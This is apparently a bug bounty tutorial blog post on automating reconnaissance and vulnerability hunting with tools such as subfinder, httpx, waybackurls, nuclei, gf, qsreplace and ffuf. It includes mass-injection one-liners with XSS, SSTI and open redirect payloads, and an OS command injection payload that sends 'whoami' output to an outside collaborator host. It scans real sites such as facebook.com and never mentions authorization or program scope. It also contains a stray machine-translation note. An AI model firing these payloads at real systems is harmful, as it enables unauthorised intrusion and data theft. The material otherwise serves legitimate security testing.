Advanced Bug Bounty Automation

Introduction

Hey there, my name is Masaud Ahmad and today we are going to automate bug bounty hunting and web application pentesting from basics to advanced. This process requires the need for several tools and a VPS may also be required. If your internet connection and system are good enough, you can also do it on your main system. In this process, we will automate various types of bugs and processes such as fuzzing, SQL injection, OS command injection, open redirect vulnerabilities, SSTI, XSS, and much more. After reading this article, you will be able to start bug hunting and begin finding different bugs. First, we need to install and configure the necessary tools. (Advanced Bug Bounty Automation)

Table of Contents

tools we will use to automate bug bounty hunting

we will use the following tools.

subfinder
httpx tool
katana tool
waybackurls
dnsx
naabu
gf tool
parallel tool (sudo apt-get install parallel)
burpsuite pro version
google dorking techniques
qsreplace tool
ffuf tool
sqlmap tool
Niclei tool

We will also need many tools that we will use, configure, and install as we progress towards automating bug bounty hunting or web application pentesting. Don’t worry about these tools, as we have many at our disposal. Let’s proceed with our article step-by-step.

I have attached the links for these tools from their official repositories on Github. You can easily install them. First of all, you need to install Go language on your system or VPS.

Tools Installation and prectical work

apt-get install golang

Most of the tools we use are written in Go language, so it is necessary to install Go language. So, I assume that you have already installed Go language.

Most of the tools we use are written in Go language, so it’s necessary to install Go language. So, I’ll assume that you have already installed Go language. (Advanced Bug Bounty Automation)

Now, I will tell you where the Go language directory is located and where its tools are stored. Type the following command:

cd /root/go/bin

You will find a subdirectory inside the Go directory called ‘bin,’ where all the tools will be installed. Any tool that you develop in Go language will be stored in this directory. You can see my tools in the screenshot.

But this is not enough because we are automating bug bounty, so we need to access our tools through the terminal from anywhere. So, we will move or copy these tools to the /usr/bin folder. This will enable us to run our tools from any location without specifying the location.

Here’s an example to make the concept clear:

cd /root/go/bin

Copy subfinder to /usr/bin

subfinder -d example.com >> subdomains.txt

I hope this makes the concept of Go language clear. Let's proceed further.

pick a target

Firstly, you need to pick a target that you want to hunt for. In my case, I am picking example.com so that I can demonstrate it to you. In the first step, we will perform subdomain enumeration. This means we will try to find all the subdomains of our target using the subfinder tool.

Firstly, I created a separate folder named “bug” on my desktop where I will perform all my tasks. The first step I executed was the following command:

subfinder -d example.com >> subdomains.txt

This command helped me find all the subdomains of the target and store them in a file named “subdomains.txt”. Remember, you can also use tools like Amass, Sublist3r, etc. to find subdomains. The more tools you use, the better results you will get. If you purchase the API key of SecurityTrails, you will get even better results.

The next step is to store the active subdomains in a separate list. We don’t need the dead subdomains for testing. For this, we will use the “httpx” tool, which will help us extract live subdomains from the list of subdomains.

subfinder -d example.com | httpx -o livesubdomains.txt

We can directly use the “httpx” tool with “subfinder”. First, “subfinder” will find all the subdomains, then “httpx” will check for the live subdomains and store the results in a file named “live_subdomains.txt”.

This process may take some time depending on your internet speed and system performance. Let’s proceed with the next steps while we wait for the results to come in.

Katana web crawler

Katana is an open-source, free web crawler that allows us to extract all the endpoints of a website/web application. We can provide it with a single URL or a complete list of subdomains. The tool itself will crawl and find all the endpoints (URLs, parameters, JS files, etc.) and store them in a file. (Advanced Bug Bounty Automation)

katana -u https://google.com >> KatanaResult.txt

these endpoints will be usefull for us during our pentest.

Grabbing all endpoints from waybackurls machine

waybackurl is a very usefull tool for us, it have the ability to grab million of endpoints (depending on target) with in few minutes.

we have command for it.

cat livesubdomains.txt | waybackurls >> urls.txt

We have learned a lot of things such as using Golang and its tool installation method, subdomain enumeration, grabbing live subdomains from a subdomains list using httpx. We have also learned how to use Katana and waybackurls. Let’s continue to explore further.

Dnsx tool | How to use it

Now we will convert all the subdomains that we enumerated earlier into IP addresses.

dnsx -l livesubdomains.txt -silent -a -resp-only -o ip.txt

Using this command, we will convert all the live subdomains that we enumerated earlier into IP addresses. This will allow us to later perform a port scan on these subdomains using the Nmap tool, and conduct a penetration test on the open ports.

Naabu tool use in Bug Bounty

Now we will perform port scanning using the Naabu tool on the IPs that we obtained through the DNS enumeration using the subdomains. We will scan ports 1 to 1000 on those IPs that we obtained using the DNSx tool. We can also perform the port scan directly on the livesubdomains.txt file. Here, I will perform the scan on the IPs where live ports are running, and the result will be saved in the ipswithport.txt file.

here is the command for it:

naabu -tp 1000 -l ip.txt >> ipwithports.txt

Now, let’s assume that you have installed Golang and the necessary tools, enumerated the subdomains, used httpx to find live subdomains, used Katana and Waybackurls to extract endpoints, and ran dnsx and Naabu. I am teaching you limited things here, but you can learn more from Twitter or ChatGPT. (Advanced Bug Bounty Automation)

Let’s continue further. Our next step is to use Nuclei on our target.

Nuclei vulnerability scanner for bug hunters

Nuclei is a vulnerability scanner that helps us automate many vulnerabilities, and it keeps scanning the target for vulnerabilities on your behalf and shows you the findings. With the help of ChatGPT, you can also create custom .yml files for Nuclei.

cat livesubdomains.txt | nuclei -o nucleiresult.txt

Hunt bugs using Nuclei

It will take some time thats why i am change my target to a single domains called facebook.com, because I have 5k+ subdomains in my livesubdomains.txt.

nuclei -u facebook.com
to store the result in output file use below command
nuclei -u facebook.com >> output.txt

You can view the results of Nuclei by running it on your target, just like you did with the ipswithport.txt file. In the same way, you can also run Nuclei on the livesubdomains.txt file to find a bunch of bugs.

I hope you are enjoying the article so far. Let’s move on to the next section.

Bug Bounty Tips and automation

Now, I will share a one-line bash script command with you that will help you extract all parameters of any website or web application without any error. This command will extract all parameters, whether it is a single parameter in any URL or double or triple.

Here is the command, which I created with the help of ChatGPT and is my own private method that I am sharing with you:

(Note: The original command was not provided, so I cannot translate it. Please provide the original command if you would like me to translate it for you.)

waybackurls http://example.com | grep -Eo '(https?://[^/?#]+/[^"'"'"']*[?&]([[:alnum:]_]+={1,3}[[:alnum:]_]+)+)' | sort -u >> ok.txt 
it will grab all the parameters from target example.com and then it will remove duplicates and finally it will stored them in ok.txt

Automate Cross Site Scripting ( XSS AUTOMATION )

In XSS automation, we will learn two methods: one with the gf tool and the second one without any tool. First, we will use the gf tool. I have mentioned the link to install the gf tool at the beginning, and it is very easy to install. I assume that you have already installed the gf tool. *Advanced Bug Bounty Automation*

Basically, we can automate a lot of vulnerabilities using gf tool. It is not only used for XSS, but we can automate all types of vulnerabilities such as XSS, SSTI, SQLi, subdomain takeover, URL redirect, and much more.

cat xss.json

cat xss.json 
{
     "flags": "-iE", 
     "patterns": [
"q=",
"s=",
"search=",
"lang=",
"keyword=",
"query=",
"page=",
"keywords=",
"year=",
"view=",
"email=",
"type=",
"name=",
"p=",
"callback=",
"jsonp=",
"api_key=",
"api=",
"password=",
"email=",
"emailto=",
"token=",
"username=",
"csrf_token=",
"unsubscribe_token=",
"id=",
"item=",
"page_id=",
"month=",
"immagine=",
"list_type=",
"url=",
"terms=",
"categoryid=",
"key=",
"l=",
"begindate=",
"enddate="

]
}

If you study the files of the gf tool, you will see that these files find parameters related to every type of vulnerability. You can also extract these parameters using a web crawler or use the waybackurls machine tool. The benefit of this is that you will get the URLs where the vulnerability you want to hunt for exists, which increases your chances of finding the vulnerability. I hope you understand how the gf tool works. Now, let’s learn how to use it practically.

To use the gf tool, you need a list of URLs/parameters/endpoints, which I have already taught you how to extract using the waybackurls machine for any target.

I already have a waybackurls.txt file from my previous hunting on Dell, which I’ll be using because it contains many parameters that I can use.

gf xss waybackurls.txt | tee xss.txt

This command instructs GF tool to execute the xss.json file on the waybackurls.txt file and create a separate file called xss.txt containing all the parameters that match the ones in the xss.json file from the waybackurls.txt file.

We have gathered many parameters that could potentially have XSS vulnerabilities, but we are not sure, so I will make this list shorter. I want to create the xss.txt file with only those parameters that reflect my query, meaning those parameters that show reflection.

cat xss.txt | grep '=' | qsreplace 'xxxxx' | ffuf -w - -u FUZZ -mr 'xxxxx'

This command will replace the xxxxxx with each parameter and start fuzzing through the ffuf tool. If the parameter reflects, then it will return a 200OK response. You can filter the ffuf results to only show 200OK responses. You can use ChatGPT for help. I have left seeking help from people since ChatGPT was released. If you are a security researcher, then ChatGPT is the best teacher you can get. Just make sure to use it only for educational purposes. :v

Fuzz your XSS payload direct on a list

cat paramresult.txt | grep '=' | qsreplace '"><script>alert(1)</script>' | ffuf -w - -u FUZZ -mr "<script>alert(1)</script>"
if your payload get triggered you will get 200OK :v

Send your all traffic to burp for further analysis

Now that we have found all the parameters that are reflecting and may have possible XSS, we will send all of them to Burp Suite for analysis. For this, you must have the Parallel tool installed in your Kali by default, or you can install it.

parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null

Run this command in your terminal and you are ready to send traffic to your BurpSuite. Let’s send the XSS file to Burp now.

cat xss.txt | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null

With this command, we will send the xss.txt file to Burp, which we recently created if you remember.

Let’s take a closer look at everything we’ve done so far. I have sent all the necessary files to Burp Suite with a single command. Now, in Burp Suite, you can easily send each request to the Repeater and start hunting for possible XSS vulnerabilities. I hope you have understood everything. Using this method, you can also automate the detection of vulnerabilities such as SQL injection, SSRF, command injection, open redirect, etc. Isn’t it fun? This is just the beginning, let’s get started!

You can use Google dorking to find specific endpoints/parameters and perform a pentest on them.

Pro tip: Create a separate profile in Burp Suite for the specific vulnerability you are hunting for. For example, if you are hunting for XSS, select only XSS vulnerabilities in the profile and automate the audit in the background. Check the screenshot below.

let’s talk about qsreplace tool

“qsreplace” is a tool that allows you to replace the value of any parameter with your desired value. For example, if we have a parameter like this: “GET /dellstore/config.aspx?oc=w576002in”, you can use qsreplace to change the values after “=” sign. Remember, you can use this tool for mass hunting, but do not take it lightly. If you have a large list of parameters with millions of values, you can use the qsreplace tool to replace all of their values with your desired payload. 🙂

cat waybackurls.txt | qsreplace "masaud"

Study the above command. I have more than one million parameters in my waybackurls. Now, all these parameters will be replaced with the word ‘masaud’. You can also add your own payload with the masaud word. (Advanced Bug Bounty Automation)

cat waybackurls.txt | qsreplace "BURP-COLLAB" | tee redirect.txt

Please study this command. We are using our BurpSuite collaborator in this command. If our payload hits, we will receive DNS/HTTP requests in our Burp Collaborator. Using this method, we can also automate other bugs.

gf ssti waybackurls.txt | tee ssti.txt
cat ssti.txt | qsreplace "masaud" | tee ssti.txt
ffuf -c -u "FUZZ" -r -w ssti.txt --replay-proxy http://127.0.0.1:8080
now goto proxy tab option and goto match and replace
match = masaud
replace = {{4+4}}masaud${{4+4}}
comment SSTI
once it completed search for 16 and disabled reuest header and req body
check for 16, 16masaud, masaud16,if you found it it means you found ssti .:D

I hope you understood the above commands. If not, it’s okay, I will explain it to you.

Firstly, I used the gf tool to extract all the possible vulnerable parameters from the waybackurls.txt file and saved them to the ssti.txt file.

Then, I replaced all the values of the parameters with “masaud” using the qsreplace tool. Now, all the parameter values are “masaud”.

After that, I fuzzed all the parameters using the parallel tool and sent all the requests to Burp Suite.

Then, I went to the proxy tab in Burp Suite and used the match and replace option to replace the parameter values with my own values.

Now, I am using the search option to find possible values (16, 16masaud, masaud16), and if any of these values are triggered, then there might be an SSTI vulnerability, and I can hunt it down.

OS Command injection automation

Using the ffuf tool, we can automate OS command injection. For this, we need two things. Firstly, we need the pro version of Burp Suite, which allows us to use the Burp Collaborator. Secondly, we need the ffuf tool installed to fuzz the parameters with our OS command injection payloads.

cat waybackurls.txt | grep "=" | qsreplace "%7C%7Cnslookup%2B%60whoami%60.dtajsntvppw5f8zq3bjqiibxloref3.oastify.com%7C%7C" | ffuf -w - -u FUZZ

You can see in the screenshot that I have automated the OS command injection. Just add your payload after the (.) and start fuzzing the list in Burp Collaborator. It will fuzz on every parameter and show you the results in Burp Collaborator. I have also encoded the payload to make it work properly.

When will you follow me on Twitter. ? @masaudsec

Automate OpenRedirect Vulnerability

payloads (Advanced Bug Bounty Automation)

\/\/
@
//

example

https://facebook.com///BURP-COLLAB.NET
https://facebook.com/@BURP-COLLAB.NET
https://facebook.com\/\/BURP-COLLAB.NET

wait for part 2. if you have any querry, contact me on twitter @masaudsec